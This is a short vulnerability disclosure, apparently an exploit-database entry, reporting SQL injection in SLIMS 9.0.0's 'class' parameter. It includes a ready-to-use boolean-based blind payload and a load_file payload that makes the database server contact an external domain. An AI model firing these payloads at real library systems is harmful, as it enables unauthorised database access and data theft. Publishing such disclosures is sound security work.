Senayan Library Management System 9.0.0 SQL Injection

## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9 SQLi## Author: nu11secur1ty## Date: 11.09.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi## Description:The manual insertion `point 3` with `class` parameter appears to bevulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+'was submitted in the manual insertion point 3.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The application interacted with that domain, indicating that theinjected SQL query was executed.## STATUS: HIGH Vulnerability[+] Payload:```MySQL---Parameter: class (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND'dLjf'='dLjf&membershipType=a&collType=aaaa---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi)## Proof and Exploit:[href](http://localhost:5001/sy5wji)## Time spent`03:00:00`